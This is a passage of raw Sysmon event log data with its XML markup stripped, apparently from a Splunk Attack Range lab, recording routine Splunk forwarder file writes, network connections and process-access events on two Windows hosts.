AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50146-false10.0.1.12-8000- 23542300x800000000000000083189Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.056{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6A489834EEA8A810942A33CDFCEB9B0,SHA256=59A2FA00F228F08172E29D7BF4705B113009832433CC0521616F3779EC6E592B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106808Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:34.230{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F55B11330498763A1106C0706D976864,SHA256=B2E2FC42AD73DE8D70CEE5E709A2929B19F7840295DC49BFFBD7BE7AEC8B3556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106807Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:34.230{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D9DD508F884E12D8B481FBD84E4AB54,SHA256=C1C0C0B2C06FD2BFD098B7EA576E87147C3F4B47B095F888906643D697BFD3FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106811Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:34.401{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51861-false10.0.1.12-8000- 23542300x8000000000000000106810Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:35.582{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DCB61958F33312959417D92538FA856,SHA256=1CEF91152DC6E4227603B2192576C041FA6CBD1531A18360084311DA8EB5CC09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083221Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.760{2FDD8D40-B4A3-615A-8C01-00000000FD01}3108920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083220Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.697{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA897BDBC5028DAC3465E86BDDA6DEDA,SHA256=00155FD9DFC74A50C7B8AD0F6C6BF7B02569CBE2532BA11D53825323DC0A85D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083219Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4A3-615A-8C01-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083218Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083217Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083216Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083215Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083214Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083213Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083212Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083211Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083210Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083209Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B4A3-615A-8C01-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083208Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.525{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4A3-615A-8C01-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083207Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.526{2FDD8D40-B4A3-615A-8C01-00000000FD01}3108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083206Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.494{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F119018B265FE7055BC693C5044EF76,SHA256=5D278499FC7274156772D979E268E3FF566A78FC426AA3D1A5BEAD6FB16EA4D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083237Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.730{2FDD8D40-B4A4-615A-8D01-00000000FD01}9803564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083236Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.698{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDE73478CC266FBC69A1AE9C63FF5B3D,SHA256=C99C71776CC5A08C2E0B6DE5BE1F1EA15CA0DC3A1D23E4DCC6F362C124ADA466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106813Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:36.598{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=946E5A6B285ECE855E24A4F2A0F22D4E,SHA256=F5B69A47BC611F1617B97CCFC7D9CA8F09C031E89CD6F52FC0A11CBE66845AFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106812Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:36.036{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-032MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083235Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.574{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=33B128001DF11485ADF2B76282A554D8,SHA256=F1B9059ED4DA2061CFF88995D9C7EC1D01647C0CDB24FE42EE5CA00528D2AAB0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083234Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4A4-615A-8D01-00000000FD01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083233Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083232Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083231Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083230Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083229Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083228Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 